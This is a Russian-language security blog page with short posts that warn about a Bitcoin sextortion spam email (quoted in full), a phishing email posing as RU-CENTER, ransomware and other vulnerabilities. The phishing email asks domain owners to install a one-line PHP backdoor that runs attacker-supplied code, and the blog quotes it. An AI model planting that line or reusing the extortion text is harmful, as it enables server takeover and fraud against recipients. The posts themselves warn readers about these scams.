?

Log in

No account? Create an account
Security (b)log
Журнал (о) безопасности
Recent Entries 
За последние несколько недель пришло множество писем, якобы с наших взломанных почтовых адресов, на них же самих.
Но на самом деле ничего не взломано, просто адреса отправителей подделаны, и письма отправляются на наши публичные сервера, которые их вполне принимают.
Тексты немножко различные, одно письмо аж на японском языке, но все эти спамеры требуют прислать денег на ихние счета в Bitcoin.

Hello!

I'm a hacker who cracked your email and device a few months ago.
You entered a password on one of the sites you visited, and I intercepted it.

Of course you can will change it, or already changed it.
But it doesn't matter, my malware updated it every time.

Do not try to contact me or find me, it is impossible, since I sent you an email from your account.

Through your email, I uploaded malicious code to your Operation System.
I saved all of your contacts with friends, colleagues, relatives and a complete history of visits to the Internet resources.
Also I installed a Trojan on your device and long tome spying for you.

You are not my only victim, I usually lock computers and ask for a ransom.
But I was struck by the sites of intimate content that you often visit.

I am in shock of your fantasies! I've never seen anything like this!

So, when you had fun on piquant sites (you know what I mean!)
I made screenshot with using my program from your camera of yours device.
After that, I combined them to the content of the currently viewed site.

There will be laughter when I send these photos to your contacts!
BUT I'm sure you don't want it.

Therefore, I expect payment from you for my silence.
I think $861 is an acceptable price for it!

Pay with Bitcoin.
My BTC wallet: 1DVU5Q2HQ4srFNSSaWBrVNMtL4pvBkfP5w

If you do not know how to do this - enter into Google "how to transfer money to a bitcoin wallet". It is not difficult.
After receiving the specified amount, all your data will be immediately destroyed automatically. My virus will also remove itself from your operating system.

My Trojan have auto alert, after this email is read, I will be know it!

I give you 2 days (48 hours) to make a payment.
If this does not happen - all your contacts will get crazy shots from your dark secret life!
And so that you do not obstruct, your device will be blocked (also after 48 hours)

Do not be silly!
Police or friends won't help you for sure ...

p.s. I can give you advice for the future. Do not enter your passwords on unsafe sites.

I hope for your prudence.
Farewell.
Уважаемые клиенты!

Некоторые наши клиенты периодически получают письма якобы от имени RU-CENTER, призывающие:

разместить в корневой директории сайта вредоносный файл для подтверждения права владения доменом;
произвести оплату услуг по ссылке, ведущей на сайт, не имеющий отношения к RU-CENTER;
оплатить «регистрацию домена в поисковых системах», «присутствие в интернете» и т.д.

Подобные письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом, не запрашиваем у клиентов пароли в электронных письмах, не размещаем формы оплаты наших услуг на сторонних ресурсах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов, публикуемые на нашем сайте.
Read more...Collapse )

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.

Read more...Collapse )
под общим названием "BlueBorne", которые позволяют захватить управление устройством и получить доступ к его данным. Причём практически на всех операционных системах: Winodws, Linux, Android, iOS.. Хотя сейчас производители операционок эти дырки затыкают, но на старых системах они остаются.

Информация от компании, которая это обнаружила: https://www.armis.com/blueborne/

Взято с BugTrack.ru
Вроде её уже исправили и в винде, и в линуксе, и во FreeBSD, но она там присутствовала больше 20 лет..
Подробности тут:



Найдено в bugtrack.ru
18th-May-2017 03:41 pm - Сигнал!
Signal - это такой opensource'ный мессенджер (с возможностью аудио- и видеопереговоров) для андроида и iOS, а также на обычных компьютерах в виде плагина для Хрома или Хромиума.

Я раньше про него не слыхал, а теперь он оказался разрешён для использования американскими сенаторами, поскольку он идеален с точки зрения информационной безопасности: хотя он и пользуется серверами компании-разработчика, но шифрует и дешифрует все передаваемые данные непосредственно в клиентской программе, и потому русским хакерам не удастся перехватить их по дороге и даже на сервере: https://lawfareblog.com/step-forward-security

Via Bruce Schneier

Кто-нибудь пробовал им пользоваться?
12th-May-2017 09:31 pm - Wana Decrypt0r 2.0
Новый вирус/ransomware Wana Decrypt0r 2.0 шагает по планете.

Уже заражены российский МВД, Мегафон, 16 госпиталей Британии, испанская Telefonica, китайские университеты, что-то на Тайване. Распространяется, скорее всего, через февральскую дыру в SMBv1. Проверьте вашу винду на апдейты.


Подробности на английском: https://www.bleepingcomputer.com/news/security/wana-decrypt0r-ransomware-using-nsa-exploit-leaked-by-shadow-brokers-is-on-a-rampage/
Подробности на русском: https://geektimes.ru/post/289115/
Патч: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Карта заражений в реальном времени: https://intel.malwaretech.com/WannaCrypt.html
И не просто так, а конкретно в Microsoft Malware Protection Engine..
Подсовывание туда на проверку файла со встроенным специфическим джаваскриптом позволяет запустить любой код, или спровоцировать DoS: CVE-2017-0290
Originally posted by dil at Доигрались с интернационализированными доменами..

Теперь можно зарегистрировать домен, выглядящий точно так же, как чужой, только с буковками из другого алфавита. И даже приделать к нему честно подписанный SSLный сертификат: https://www.аррӏе.com/

Выглядит почти как настоящий, но на самом деле это xn--80ak6aa92e.com, с буквами из кириллицы: “а”, “р”, “е”, и “ӏ” (так называемая, “палочка” , которая используется в некоторых кавказских языках).


Подробности тут.


Как обычно, про эту дырку в безопасности сообщил Брюс Шнайер.

This page was loaded Nov 18th 2018, 12:15 pm GMT.